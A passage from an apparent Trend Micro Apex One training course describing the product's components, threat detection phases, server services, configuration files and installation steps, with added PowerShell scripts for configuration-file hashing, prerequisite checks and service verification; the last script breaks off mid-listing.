make to potential Command & Control servers, and Browser Exploit Protection blocks Web pages
containing malicious scripts.

Firewall Protection
The Apex One firewall protects endpoint computers on the network using stateful inspection. Rules
can be created to filter connections by application, IP address, port number and protocol, and then
applied to different groups of users.

Data Loss Prevention


Data Loss Prevention safeguards an organization’s digital assets against accidental or deliberate
leakage.

Device Control
Device Control regulates access to external storage devices and network resources connected to
computers. Device Control helps prevent data loss and leakage, and, combined with file scanning,
helps guard against security risks.

Outbreak Control
Apex One Outbreak Prevention Services shut down infection vectors and rapidly deploys attack
specific security policies to prevent or contain outbreaks before pattern files are available.


Application Control
Application Control enhances defense against malware or targeted attacks by preventing unwanted
and unknown applications from executing on endpoints. Application Control is currently only
supported on Windows endpoint computers.

Virtual Patching
Vulnerability Protection protects endpoints from being exploited by attacks on operating system
vulnerabilities. It automates the application of virtual patches to endpoint computers before official
patches from the vendor become available.

Endpoint Detection and Response


Apex One provides actionable insights, expanded investigative capabilities, and centralized visibility
across the network through an advanced Endpoint Detection and Response (EDR) toolset. Perform
threat investigation through integrated EDR or by boosting your security teams with the Managed
Detection and Response (MDR) service option. Endpoint Detection and Response capabilities are
included in Apex One and Apex Central but are licensed separately.

Endpoint Encryption
Endpoint Encryption encrypts data on a wide range of devices including laptops and desktops, USB
drives, and other removable media, providing full disk, file/folder, and removable media encryption to
prevent unauthorized access and use of private information. Endpoint Encryption is a standalone
product that is licensed and installed separately from Apex One, but its capabilities can be integrated
into Apex One Security Agents through Apex Central policies.

Cloud-Based Intelligence
Apex One benefits from a global cloud-based repository of threat data through the Trend Micro
Smart Protection Network. Services, such as ActiveUpdate, File Reputation, Web Reputation,
Predictive Machine Learning and more are delivered to Trend Micro products through the cloud-
based Smart Protection Network.

Automated Updates
Apex One Agents benefit from regular, automated updates to malware signatures and patterns.

Multi-Platform Support
Apex One provides endpoint protection features for both Windows and Mac operating systems.
Support for Mac endpoints is enabled through a plug-in in Apex One. Not all Apex One functionality is
currently available on Mac endpoint computers.


Simplified Administration
The Apex One Web Management console gives administrators access to all Agents and Servers on
the network. From the Web Management console, administrators can coordinate automatic
deployment of security policies, pattern files, and software updates on every Agent and server. Apex
One also performs real-time monitoring, provides event notification and delivers comprehensive
reporting. Administrators can perform remote administration, remote installation of Agents, set
customized policies for individual desktops or groups, and lock Agent security settings.

Off-Premise Management
Apex One provides management to external Security Agents through the Edge Relay Server. This
device provides log collection, sample submission and suspicious list deployment to Agents outside
of the network.

Unified Agent
Apex One provides a wide breadth of capabilities through a single unified agent. This all-in-one
lightweight agent provides deployment flexibility through both Software as a Service (SaaS) and on-
premises options.


Trend Micro Apex One Components


Apex One consists of multiple components that work together to protect endpoint computers.

[Figure: Apex One components: Sandbox as a Service, Apex One as a Service, Apex Central as a Service, Apex One Edge Relay Server, Trend Micro ActiveUpdate Server, Remote Security Agents, Apex Central, Apex One Server, Apex One (Mac) Server, Active Directory, Apex One/Apex One (Mac) Web Management Console, IIS, Database, Deep Discovery Analyzer, Mac Sandbox, Smart Protection Server, Trend Micro Endpoint Encryption, Update Agent, Security Agents]

Apex One Server


The Apex One Server is the central repository for all Windows Agent configurations, security risk
logs, and updates. The server performs two important functions:
• Installs, monitors, and manages Security Agents on Windows endpoints
• Downloads most of the components needed by Agents


Apex One (Mac) Server


The Apex One (Mac) Server is the central repository for all Mac Security Agent configurations,
security risk logs, and updates. The server performs two important functions:
• Monitors and manages Security Agents on Mac endpoints
• Downloads components needed by Security Agents

Apex One (Mac) Server is activated through a plug-in within Apex One Server. The Server
communicates with the Security Agents through the ActiveMQ protocol.

Database
The database stores all the information Apex One requires to operate. A Microsoft SQL Server
database is required to complete the Apex One setup. Alternatively, an SQL Server Express database
can be installed as part of the setup process. The database can be hosted on the same server as
Apex One, or can be hosted on a separate server.

Microsoft Internet Information Server


Microsoft Internet Information Server (IIS) makes it possible to access Apex One components from
the Internet, including:
• Apex One Web Management console for management operations
• CGI applications or ISAPI for both Agent and Server functions
• Update components
• Integrated Smart Protection Server

Apex One/Apex One (Mac) Web Management Console


Apex One uses a Web-based administration interface to control policies and endpoint computers.
Administrative users authenticate to the Apex One Web Management console using Apex One-
created credentials, or credentials stored in Microsoft Active Directory. Separate Web Management
consoles are available for Apex One and Apex One (Mac).

Apex Central
Apex Central (previously known as Control Manager) provides a single unified interface to manage,
monitor, and report across multiple layers of security and deployment models. Customizable data
displays allow administrators to rapidly assess status, identify threats, and respond to incidents.
With Apex Central, administrators can manage Apex One, Apex One (Mac), as well as other Trend
Micro products, from a single interface.

User-based visibility shows what is happening across all endpoints, enabling administrators to
review policy status and make changes across all user devices. In the event of a threat outbreak,
administrators have complete visibility of an environment to track how threats have spread.


Direct links to the Trend Micro Threat Connect database provide access to actionable threat
intelligence, which allows administrators to explore the complex relationships between malware
instances, creators, and deployment methods.

Apex Central is responsible for compiling the Suspicious Objects List for use in Connected Threat
Defense. This list is based on information provided by other components in the infrastructure.

Some features in Apex One, including Application Control, Vulnerability Protection and Endpoint
Detection and Response require integration with Apex Central.

Security Agents
An Apex One Security Agent on each endpoint protects Windows and Mac computers from security
risks. The Apex One Agent reports to the parent Apex One Server from which it was installed and
sends security events and status information to the Server in real time. Security Agents can be
installed on endpoint computers within and outside the corporate network.

Apex One Edge Relay Server


The Apex One Edge Relay Server provides off-premise protection for remote computing and
traveling users. It provides visibility and protection for endpoints that leave the local intranet,
without requiring a VPN to connect back to the Apex One Server.

Trend Micro Smart Protection Network


The Trend Micro Smart Protection Network is a cloud-client infrastructure that delivers protection
from emerging threats by continuously evaluating and correlating threat and reputation intelligence
for Websites, email sources, and files.

Smart Protection Server


The Smart Protection Server provides an internal, standalone source for the File Reputation and
Web Reputation services. The Smart Protection Server can also be used to proxy service requests
for Predictive Machine Learning scanning in air-gapped environments.

Trend Micro ActiveUpdate Server


Trend Micro ActiveUpdate Server serves as the default download source for pattern file and
program updates. Other sources, including Apex Central or Update Agents can be used as the
download location instead of the ActiveUpdate Server.

Update Agents
Update Agents are Security Agents that function as alternative update sites for other Agents within
an Apex One network. Update Agents serve as local ActiveUpdate sites.

Trend Micro Endpoint Encryption


Trend Micro Endpoint Encryption encrypts data on a wide range of devices — both PCs and Macs,
laptops and desktops, USB drives, and other removable media. This solution combines enterprise-
wide full disk, file/folder, and removable media encryption to prevent unauthorized access and use
of private information. Endpoint Encryption is an optional, standalone product, but can be
incorporated into policies distributed through Apex Central.

Deep Discovery Analyzer


Deep Discovery Analyzer is a hardware device hosting multiple secure sandbox environments in
which samples submitted by Trend Micro products are analyzed. Sandbox images allow for the
observation of file and network behavior in a natural setting without any risk of compromising the
network.

Deep Discovery Analyzer performs static analysis and behavior simulation to identify potentially
malicious characteristics. During analysis, Deep Discovery Analyzer rates the characteristics in
context and then assigns a risk level to the sample based on the accumulated ratings. The result is
then forwarded to Apex Central to build the Suspicious Objects List.

Mac Sandbox
Mac Sandbox is a hosted service that analyzes possible threats for macOS.

Software as a Service Components


Apex One is available as a Software as a Service offering. Components available as a service are
accessed from cloud servers hosted by Trend Micro.

Apex One as a Service

Apex One as a Service allows an organization to deploy and manage Apex One as a cloud-based
service and offers full feature parity with the on-premises option.

Apex Central as a Service

Apex Central as a Service provides Apex Central capabilities as a cloud-based service.

Sandbox as a Service

This cloud-based Virtual Analyzer allows you to perform sample submission, synchronize
suspicious object lists, and take action on user-defined suspicious objects.

Optional Third-Party Components

Microsoft Active Directory

Apex One integrates with Microsoft™ Active Directory™ to manage Security Agents more
efficiently. Web Management console permissions can be assigned using Active Directory
accounts, endpoint computers without Security Agents can be located, and Agents can be grouped
automatically based on their Active Directory domain.

Trend Micro Apex One Deployment Methods

On-Premise Apex One Server


An on-premise installation of Apex One installs the Apex One Server on a Windows Server within the
local network.

Apex One as a Service


Apex One as a Service provides rapid deployment and simplified administration and maintenance
with the same comprehensive enterprise threat protection as Trend Micro on-premises Apex One.
Apex One as a Service is delivered through an architecture that uses resources more effectively and
optimizes CPU and network utilization.

With this service offering, Trend Micro applies updates and patches to the service on a regular basis.
Administrators log into the Web Management console through a customized URL. Trend Micro
provides feature parity between the on-premise and service version of Apex One.

An on-premise deployment of Apex One can be migrated to Apex One as a Service.

Threat Detection
There are several points at which threats could enter the system through the endpoint computer. A
variety of automated threat detection techniques can be enabled in Apex One to monitor for threats on
the endpoint.
[Figure: threat detection phases: Entry point, Pre-execution, Runtime, Exit point]

Detecting Threats at the Entry Point


Entry point detection uses methods to capture threats as they enter the endpoint. These methods
include:
• Web Reputation: Web reputation blocks connections to malicious Web sites. This is done at
the kernel level, allowing Apex One to not only block users from accessing a malicious site,
but also blocking programs on the endpoint from accessing the site. 
• Operating System Vulnerability Protection: Apex One blocks exploits of operating system
vulnerabilities by applying a virtual patch. Trend Micro provides timely protection for
operating system vulnerabilities, backed by the industry’s most timely vulnerability research.
• Browser Exploits: Malicious behavior can also be captured within the Web browser based on
script inspection and site behavior.
• Device Control: Apex One can block unknown removable media devices, making it less likely
for the endpoint to be infected with malware. This protection is now also available for the
Mac in Apex One.

Detecting Threats Pre-execution


Detection methods used in the pre-execution phase capture and block threats as they are written to
disk or to memory. These methods include:
• Packer Detection: Apex One identifies packed malware as it unpacks prior to execution,
blocking threats attempting to hide themselves in memory.
• Predictive Machine Learning: File-based threats can be evaluated against a cloud-based
model before they are run to predict if the file is malicious. Apex One can take advantage of
an offline model in cases where the endpoint is not connected to the network. Mac
computers can now benefit from this technique as well.
• Application Control: Application control prevents unrecognized software from executing.
• Variant Protection: Variant protection detects mutations of malicious samples by
recognizing known fragments of malware code.
• File-based Signatures: The majority of threats still arrive at the endpoint as file-based
attacks. File-based signatures provide an effective technique for detecting known malicious
items.

Detecting Threats at Runtime


While many threats can be detected as they are written to disk, there are some threats that won’t be
detected until they execute. Detection methods used in this phase include:
• Predictive Machine Learning: Run-time machine learning techniques monitor anything that
is executing and evaluate it against a separate run-time machine learning model.
• Behavior Analysis: Powerful behavior analysis techniques provide a clear indication if an
attack is taking place based on file behavior. This provides an effective mechanism for
detecting ransomware and file-less malware. New rules are continually being introduced to
detect new suspicious behavior.
• In-memory Runtime Analysis: Some malware executes only in memory. In-memory runtime
analysis can monitor for malicious script behavior or code injections in memory and stop
them once they start running.

Detecting Threats at the Exit Point


Methods in this phase can detect and block attempts to forward data from the endpoint. Detection
methods used in this phase include:
• Web Reputation: At this phase, Web reputation protection can block connections to
malicious Web sites, such as Command & Control sites. Again, this protection is applied at
the kernel level blocking connections from the Web browser, or from any other application
running on the endpoint.
• Host Intrusion Prevention: Host intrusion prevention detects and blocks malware lateral
movement behavior.
• Data Exfiltration Detection: Data Leak Prevention techniques can detect sensitive data
leaving the endpoint and block its movement.
• Device Control: Unknown removable media devices can be blocked to prevent data leaving
the endpoint.

Lesson 2: Trend Micro Apex One Server

Lesson Objectives:

After completing this lesson, participants will be able to:


• Identify the responsibilities of the Apex One Server
• Identify the Apex One Server services and components
• Install the Apex One Server
• Upgrade OfficeScan XG and OfficeScan XG SP1 to Apex One

Apex One Server Tasks


The Apex One Server provides centralized management and control of the Apex One network. The Apex
One server component performs the following tasks:
• Distributes protection settings to endpoint computers
• Initializes scanning, cleaning, and other tasks
• Receives action status results
• Monitors suspicious network activity on Agents
• Maintains a central repository for all Agent configuration settings, virus and firewall logs,
Outbreak Prevention Policies, and Agent software and updates
• Installs Security Agents
• Installs components such as the Smart Protection Server, Apex One (Mac) Server and other
optional components included in the installation package
• Provides Server Authentication to ensure that all communication to and from the server is
secure and trusted
• Collects suspicious file samples and forwards them for analysis
• Retrieves the Suspicious Objects list from Apex Central and forwards it to Agents for
logging/blocking purposes
• Stores metadata collected by Endpoint Sensor for Endpoint Detection and Response activities

Apex One Server Services and Components


The following services and components are installed as part of the Apex One Server.

Apex One Master Service (Ofcservice.exe)
This component is the centralized management component of an Apex One network. It accepts and
responds to commands and requests from Apex One Security Agents, the Web Management console,
and Apex Central.
This service will always be running on the Apex One Server and provides the following
functionality for its clients:
• Stores Agent configuration settings
• Consolidates Agent logs
• Serves as the default source for update components (for example, patterns, engines, etc.)
• Provides server authentication details to ensure that all communications that the Apex One
Server sends to the Agents are trusted. The Security Agent verifies the appended signature
every time it receives a notification from the server. The Agents use a public key to verify
that incoming communications are server-initiated and valid. The Agents will only respond if
the verification is successful. If the signature verification fails, the Agent disregards the
received settings.

Apex One Apex Central Agent Service (OfficeScanCMAgent.exe)
Allows administrators to manage Apex One from the Apex Central console. This facilitates
management of multiple Apex One Servers, Apex One (Mac) Servers as well as other Trend Micro
products. Apex Central also compiles and enables access to the Suspicious Objects List.

Apex One Active Directory Integration Service (osceintegrationservice.exe)
This component interfaces with Microsoft Active Directory to provide:
• Role-based administration
• Compliance report generation
• Identification of unprotected endpoints
• Automatic grouping of Security Agents

Apex One Deep Discovery Service (OfcDdaSvr.exe)
This component handles the internal transmission of Suspicious Object samples and submits
samples to Deep Discovery Analyzer.

Apex One Log Receiver Service (ofclogrecvsvc.exe)
This service receives log information from Apex One Servers and Security Agents.

Apex One Plug-in Manager (CNTAoSMgr.exe)
This service installs and manages Apex One plug-in programs.

Trend Micro Endpoint Sensor Service (TrendMicroEndpointSensorService.exe)
Manages communication and provides support for tasks required by the Trend Micro Endpoint
Sensor Server. This service is added when Endpoint Sensor policies are enabled.

Trend Micro Application Control Service (TMiACSvc.exe)
Manages the allowed, blocked, and lockdown policies of the Application Control feature. This
service is added when Application Control policies are enabled.

Trend Micro Vulnerability Protection Service (iVPServer.exe)
Manages protected endpoints with Intrusion Prevention rules based on network performance and
security priorities. This service is added when Vulnerability Protection policies are enabled.

Trend Micro Advanced Threat Assessment Service (AtasAgent.exe)
Identifies potentially compromised endpoints through on-demand assessment and monitoring. By
integrating with Trend Micro Threat Investigation Center, Advanced Threat Assessment Service
allows administrators and information security experts to perform forensic tasks on endpoints
for remote incident response.

Trend Micro Local Web Classification Server (LWCSService.exe)
Provides the local web classification scan function to Apex One Security Agents.

Trend Micro Smart Protection Server (iCRCService.exe)
Provides the Smart Scan function to Apex One Security Agents.
• File Reputation: Provides Agents with a source for malware confirmation and removal
information. Agents obtain this information by way of HTTP/HTTPS queries.
• Integrated Web Reputation Service: Provides Agents with a source of information regarding
known malicious websites.

Trend Micro Smart Protection Query Handler (SRService.exe)
Provides the smart relay function to Apex One Security Agents.

Web Server
The Internet Information Server (IIS) Web Server makes it possible to access the following Apex One
components from the Internet:
• Web Management console
• CGI applications or ISAPI for both Agent and Server functions
• Update components
• Integrated Smart Protection Server

Apex One (Mac) Plug-in


Apex One integrates support for Mac endpoints through the Apex One (Mac) Plug-in. A separate Web
Management console is used to manage the Mac endpoints, or they can be managed through Apex
Central.

Configuration Repositories
Apex One Server configuration settings are stored in a variety of locations, including:
• Apex One Database: The database tables used by Apex One are stored in a Microsoft SQL or SQL
Express database.
• ous.ini: Contains information about alternative update sources that an Apex One Server can
use.
• ofcscan.ini: This global Agent setting file contains settings that are common to all Security
Agents that are registered with a specific Apex One Server. Agent-specific local settings
however supersede the settings in this file.
• ofcserver.ini: Contains the global Server setting information, including enabled services,
license details, Web Management console configuration, and others.
• sscfg.ini: Contains information about Smart Protection Servers.
• TrendAuthDef.xml: Contains all users and log-in information. This file is located in:
...\PCCSRV\Private\AuthorStore
• TrendAuth.xml: Contains role information for administrative access. Determines who can
access the administrative console and what access they have. This file is located in:
...\PCCSRV\Private\AuthorStore
• Certificate backup zip files: Contain backed-up certificates issued by the current Apex One
Server. Backing up the Apex One Server certificates allows you to use these certificates if you
need to reinstall the Apex One server. Run the CertificateManager.exe utility to back up the
certificates and indicate the password and path for the backup file.
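The following PowerShell script is an added example for this course and is not a Trend Micro tool. It records a SHA-256 baseline of the configuration repositories listed above and compares the live files against it, which is a practical way to notice an unexpected change to the authentication store (TrendAuth.xml, TrendAuthDef.xml) or to the global settings files. The PCCSRV path is passed in by the caller because the course does not give the full path; the script assumes the four .ini files sit directly under PCCSRV, and the baseline path in the usage comment is a constructed sample.

```powershell
# Added example for this course text; it is not a Trend Micro tool.
# Records a SHA-256 baseline of the Apex One Server configuration repositories and
# compares the live files against it so that unexpected changes are noticed.
# Assumptions (not from the course): the four .ini files sit directly under PCCSRV;
# the PCCSRV path is supplied by the caller rather than guessed here.

$ConfigFiles = @(
    'ofcscan.ini', 'ofcserver.ini', 'ous.ini', 'sscfg.ini',
    'Private\AuthorStore\TrendAuthDef.xml',
    'Private\AuthorStore\TrendAuth.xml'
)

function Get-ApexOneConfigInventory {
    # One row per repository file: existence, last write time (UTC) and SHA-256.
    param([Parameter(Mandatory)][string]$Pccsrv)
    foreach ($rel in $ConfigFiles) {
        $full = Join-Path -Path $Pccsrv -ChildPath $rel
        if (Test-Path -LiteralPath $full) {
            $item = Get-Item -LiteralPath $full
            [pscustomobject]@{
                File         = $rel
                Exists       = $true
                LastWriteUtc = $item.LastWriteTimeUtc.ToString('o')
                Sha256       = (Get-FileHash -LiteralPath $full -Algorithm SHA256).Hash
            }
        } else {
            [pscustomobject]@{ File = $rel; Exists = $false; LastWriteUtc = $null; Sha256 = $null }
        }
    }
}

function Save-ApexOneConfigBaseline {
    param([Parameter(Mandatory)][string]$Pccsrv, [Parameter(Mandatory)][string]$BaselinePath)
    # Store the baseline where the server's own administrators cannot silently rewrite it.
    Get-ApexOneConfigInventory -Pccsrv $Pccsrv |
        ConvertTo-Json |
        Set-Content -LiteralPath $BaselinePath -Encoding UTF8
}

function Compare-ApexOneConfigBaseline {
    # Classifies every repository file as Unchanged, Changed, Missing, New or NoBaseline.
    param([Parameter(Mandatory)][string]$Pccsrv, [Parameter(Mandatory)][string]$BaselinePath)
    $baseline = @{}
    foreach ($b in (Get-Content -LiteralPath $BaselinePath -Raw | ConvertFrom-Json)) {
        $baseline[$b.File] = $b
    }
    foreach ($now in Get-ApexOneConfigInventory -Pccsrv $Pccsrv) {
        $old = $baseline[$now.File]
        $status = if (-not $old)                               { 'NoBaseline' }
                  elseif ($old.Exists -and -not $now.Exists)   { 'Missing' }
                  elseif (-not $old.Exists -and $now.Exists)   { 'New' }
                  elseif ($old.Sha256 -ne $now.Sha256)         { 'Changed' }
                  else                                         { 'Unchanged' }
        [pscustomobject]@{ File = $now.File; Status = $status; LastWriteUtc = $now.LastWriteUtc }
    }
}

# Usage: take the baseline right after installation (and after each intentional change),
# then compare on a schedule and investigate every row that is not 'Unchanged'.
# Save-ApexOneConfigBaseline    -Pccsrv '<path-to>\PCCSRV' -BaselinePath 'D:\Baselines\apexone-config.json'
# Compare-ApexOneConfigBaseline -Pccsrv '<path-to>\PCCSRV' -BaselinePath 'D:\Baselines\apexone-config.json' |
#     Format-Table -AutoSize
```

Only hashes and timestamps are written to the baseline, so the file can be kept on a separate system without exposing the credentials held in TrendAuthDef.xml.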

Apex One Database


Apex One requires a Microsoft SQL Server database. A database instance must be created in SQL Server
with a username and password assigned. These details must be provided during the setup of the Apex
One Server. An additional database instance can be created to store Endpoint Sensor-related data, but
only when using the full version of SQL Server 2016 with the Full-Text and Semantic Extractions for
Search feature enabled.

If SQL Server is not available in the organization, SQL Server 2016 Express can be installed as part of the
setup.

Installing the Apex One Server


For a successful installation, review the system requirements for Apex One Server before proceeding
with the steps in the installation.

The Apex One Server can be installed on computers running different versions of Microsoft Windows
Server. Supported operating systems are listed in the following table:

Platform                  OfficeScan XG   OfficeScan XG SP1   Apex One
Windows Server 2008       √               x                   x
Windows Server 2008 R2    √               √                   x
Windows Server 2012       √               √                   √
Windows Server 2012 R2    √               √                   √
Windows Server 2016       √               √                   √
Windows Server 2019       x               x                   √

Hardware Requirements
• Processor: 1.4 GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent, AMD 64
processor or Intel 64 processor
• Memory: 2GB minimum
• Disk Space: 1.5GB minimum (3GB recommended if activating Application Control, Endpoint
Sensor, Vulnerability Protection and Data Protection on the Security Agent)

Apex One Server Pre-Installation Checklist


Prior to installing Apex One, you should review the following conditions to ensure that all necessary
permissions, ports and other settings are in place.
• Verify that the Windows Server that will be hosting the Apex One Server is running a
supported version.
• Verify that Microsoft Internet Information Server (IIS) is installed.
• An SQL Server database instance is available along with a corresponding administrator
username and password. Alternatively, SQL Server 2016 Express can be installed as part of the
setup.
• You will require an Activation Code for the Apex One Server. In addition, some optional
components, such as Endpoint Sensor, require separate licensing. Contact Trend Micro to
get the appropriate codes for your installation.
• If a proxy is needed for Internet access in your environment, you will need to supply your
proxy server address, port and log in credentials as part of the Apex One setup process.
• Decide on the Smart Protection Source in advance, as the option to install an integrated
Smart Protection Server is offered as part of the setup process.
• If the new installation of Apex One will be sharing digital certificates with an existing
installation, the details of the certificates must be provided.
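As an added example for this course (not a Trend Micro tool), the following PowerShell script checks a candidate host against the platform table, the hardware requirements and the checklist above and returns one pass/fail row per item, so the gaps can be fixed before the Setup Wizard is run. It assumes SQL Server listens on TCP 1433 (a default instance; a named instance may use a dynamic port), that IIS is detected through the Web-Server role via the ServerManager module that ships with Windows Server, and the host name sqlhost.example.local in the usage line is a constructed sample.

```powershell
# Added example for this course text; it is not a Trend Micro tool.
# Pre-flight check of a candidate Apex One Server host against the supported
# platform table, the hardware requirements and the pre-installation checklist.
# Assumptions (not from the course): SQL Server is reached on TCP 1433 (default
# instance; named instances may use a dynamic port) and IIS is detected through
# the Web-Server role with Get-WindowsFeature (ServerManager module).

# Windows Server builds that the platform table marks as supported for Apex One.
$SupportedBuilds = @{
    '9200'  = 'Windows Server 2012'
    '9600'  = 'Windows Server 2012 R2'
    '14393' = 'Windows Server 2016'
    '17763' = 'Windows Server 2019'
}

function Test-ApexOneServerPrerequisites {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$SqlServer,   # SQL Server host from the checklist
        [int]$SqlPort = 1433,                        # assumption: default instance port
        [switch]$IncludeOptionalFeatures             # use the 3 GB disk figure instead of 1.5 GB
    )
    $checks = New-Object System.Collections.Generic.List[object]

    # Supported operating system (Caption rules out client editions with the same build).
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $osPass = ($os.Caption -match 'Windows Server') -and $SupportedBuilds.ContainsKey([string]$os.BuildNumber)
    $checks.Add([pscustomobject]@{ Check = 'Supported Windows Server version'; Pass = $osPass
                                   Detail = "$($os.Caption) build $($os.BuildNumber)" })

    # Processor: 1.4 GHz minimum (2.0 GHz recommended); MaxClockSpeed is reported in MHz.
    $cpu = Get-CimInstance -ClassName Win32_Processor | Select-Object -First 1
    $checks.Add([pscustomobject]@{ Check = 'Processor >= 1.4 GHz'; Pass = ($cpu.MaxClockSpeed -ge 1400)
                                   Detail = "$($cpu.Name) at $($cpu.MaxClockSpeed) MHz" })

    # Memory: 2 GB minimum; TotalVisibleMemorySize is reported in KB.
    $memGb = [math]::Round($os.TotalVisibleMemorySize / 1MB, 2)
    $checks.Add([pscustomobject]@{ Check = 'Memory >= 2 GB'; Pass = ($memGb -ge 2); Detail = "$memGb GB" })

    # Disk: 1.5 GB minimum, 3 GB recommended when Application Control, Endpoint Sensor,
    # Vulnerability Protection and Data Protection are activated on the Security Agent.
    $needGb = if ($IncludeOptionalFeatures) { 3 } else { 1.5 }
    $disk   = Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DeviceID='$env:SystemDrive'"
    $freeGb = [math]::Round($disk.FreeSpace / 1GB, 2)
    $checks.Add([pscustomobject]@{ Check = "Free disk on $env:SystemDrive >= $needGb GB"
                                   Pass = ($freeGb -ge $needGb); Detail = "$freeGb GB free" })

    # IIS must already be installed when setup runs.
    $iis = Get-WindowsFeature -Name Web-Server
    $checks.Add([pscustomobject]@{ Check = 'IIS (Web-Server role) installed'; Pass = [bool]$iis.Installed
                                   Detail = [string]$iis.InstallState })

    # SQL Server instance reachable (setup needs its address plus a login).
    $sql = Test-NetConnection -ComputerName $SqlServer -Port $SqlPort -WarningAction SilentlyContinue
    $checks.Add([pscustomobject]@{ Check = "SQL Server $SqlServer TCP $SqlPort reachable"
                                   Pass = [bool]$sql.TcpTestSucceeded; Detail = "remote $($sql.RemoteAddress)" })

    # Proxy (informational): what the system proxy returns for the Download Center URL,
    # so the proxy address and port can be entered during setup if one is in use.
    $target   = [uri]'http://downloadcenter.trendmicro.com/'
    $proxy    = [System.Net.WebRequest]::GetSystemWebProxy().GetProxy($target)
    $proxyDetail = if ($proxy.Host -ne $target.Host) { "proxy $proxy" } else { 'direct connection' }
    $checks.Add([pscustomobject]@{ Check = 'Internet proxy (informational)'; Pass = $true; Detail = $proxyDetail })

    return $checks
}

# Usage: run on the intended Apex One Server host, then fix every row with Pass = False.
Test-ApexOneServerPrerequisites -SqlServer 'sqlhost.example.local' | Format-Table -AutoSize
```

The Activation Code, the certificate details for a shared-certificate installation and the SQL login are not checked here because they are provided to the wizard by hand; the script only covers what can be verified on the host before setup starts.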

Downloading Apex One Server for Windows


You can download the latest version of the Apex One installation package from the Trend Micro
Download Center at:
http://downloadcenter.trendmicro.com/

In the Desktop category, click Trend Micro Apex One to view the related downloads available.

On the Product Download tab, locate the installation package and download to the target computer.

Running the Setup


Run the setup application by double-clicking the downloaded setup application and step through the
Setup Wizard by clicking Next on each page after providing the required information.
1 Before beginning the setup, the installer prepares and installs any missing Windows
components.

2 Click Next to acknowledge the Welcome window.

3 Click I accept the terms of the license agreement to proceed with the setup.

4 Select whether to scan the host computer before installing the Apex One Server. This option will
scan selected folders on the host computer for security risks before beginning the setup. It may
take a few minutes to complete the scan.

Note: An Endpoint Prescan only scans selected folders, it is not a thorough system scan. The \My
Documents folder, for example, will not be scanned. This scan looks for files with specific file
extensions, including .SYS, .COM, .EXE, .DOC, .DOT, .XLS, .VBS, .PIF, and .SCR. If the setup
application detects a virus, you will be prompted for an action such as Clean, Rename, Delete and
Pass. The patterns used by this scan are those that existed when the setup package was created
and could potentially be several months old.

5 The Setup application will assess the resources on the Server to ensure it supports Apex One.

6 Identify the details of any proxy servers being used.

7 Enter the Activation Codes for Apex One.

Note: Some services in Apex One may require additional licensing.

8 Select the installation path for the program files.

9 Confirm the fully qualified domain name or IP address details for the Apex One Server.

10 Identify the details of the IIS website to be used.

11 Click to enable Endpoint Sensor support on the Apex One Server, if required.

Note: The full version of Microsoft SQL Server 2016 or later must be used as the database if choosing
to enable Endpoint Sensor support. SQL Server Express is not supported if Endpoint Sensor is to
be enabled.

12 Identify the details of the SQL Server database, or select the option to install SQL Server
Express 2016.

13 Informational details regarding Security Agent deployment are displayed.

14 Click to install an integrated Smart Protection Server, if required.

15 Click to enable the installation of a Security Agent on the server, if required.

16 Select whether you want to enable Trend Micro Smart Feedback. When enabled, your installation
contributes to the Trend Micro Smart Protection Network to improve analysis, identification, and
prevention of new threats. You can enable or configure Smart Feedback later in the Apex One
Web Management console. Optionally, enter the industry your organization belongs to by
selecting it from the drop-down list.

Note: Trend Micro Smart Feedback provides continuous communication between Trend Micro
products and the company's 24/7 threat research centers and technologies. Each new threat
identified through a single customer's routine reputation check automatically updates all of
Trend Micro's threat databases, blocking any subsequent customer encounters of a given threat.
For example, routine reputation checks are sent to the Smart Protection Network. By
continuously processing the threat intelligence gathered through this global network of
customers and partners, Trend Micro delivers automatic, real-time protection against the latest
threats and provides better together security. The privacy of a customer's personal or business
information is always protected.

Trend Micro Smart Feedback is designed to collect and transfer relevant data from Trend Micro
products to the Smart Protection Network so that further analysis can be conducted, and
consequently, advanced solutions can evolve and be deployed to protect clients.

Samples of information sent to Trend Micro:

- File checksums
- Websites accessed
- File information, including sizes and paths
- Names of executable files
You can terminate your participation in the program at any time from the Web Management
console.

17 Identify the Agent installation path. A random port number will be issued for communication
between the Apex One Server and the Agent. Record the port number displayed.

18 Click to enable the Apex One Firewall features on this server, if required.

19 Click to enable assessment mode on this server, if required. When in assessment mode, all
Agents managed by the server will log spyware/grayware detected during Manual Scan,
Scheduled Scan, Real-time Scan, and Scan Now but will not clean spyware/grayware
components. Cleaning terminates processes or deletes registries, files, cookies, and shortcuts.

Trend Micro provides assessment mode to allow you to evaluate items that Trend Micro detects
as spyware/grayware and then take appropriate action based on your evaluation.

20 Click to enable the Apex One Web Reputation features on this server, if required.

21 Enable the option to generate new authentication certificates, or use existing certificates from
another Apex One Server.

22 Type the login credentials for the Root Administrator. This administrator will be able to create
identities for any other administrative users who require access to the Apex One Web
Management console. As well, type the password that will be required to unload or uninstall the
Security Agent from an endpoint computer.

If the two passwords are identical, the setup program will display a warning. Click Yes to accept
the use of the same password, or click No to retype new passwords.

23 Confirm the folder group to display the Apex One program icons.

24 Finally, review the settings provided and click Install.

25 If the option to install an SQL Server Express 2016 instance was selected, the setup for the
database will launch.

26 A progress bar will display the status of the database installation.

27 Once the SQL Server Express installation is complete, the Setup Wizard will continue with the
Apex One setup operations.

28 Once complete, click Finish to close the wizard.

29 If the option to launch the console was enabled, the administrator is prompted to log in.

Installation Logs
The Apex One setup application records its actions in an installation log named ofcmas.log, which
it creates in the \Windows folder.

Confirming Successful Installation


Open Windows Services and confirm that the Apex One services are running.
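The following PowerShell script is an added example and not part of the Trend Micro course material. It automates the check described here for the services from the Apex One Server Services and Components table, and it surfaces failures recorded in the ofcmas.log installation log named above. It assumes that the Windows service display names begin with the component names used in the table (they are matched by prefix) and that error lines in the log contain the words "error" or "fail"; both are assumptions rather than facts from the course.

```powershell
# Added example for this course text; it is not a Trend Micro tool.
# Post-install check: are the Apex One Server services present and running, and
# does the installation log (\Windows\ofcmas.log) record any failures?
# Assumptions (not from the course): service display names start with the
# component names from the services table; log errors contain "error" or "fail".

# Display-name prefixes taken from the services table. Optional services only exist
# when their feature (integrated Smart Protection Server, Endpoint Sensor,
# Application Control, Vulnerability Protection) was enabled.
$ExpectedServices = @(
    @{ Name = 'Apex One Master Service';                        Optional = $false }
    @{ Name = 'Apex One Apex Central Agent';                    Optional = $false }
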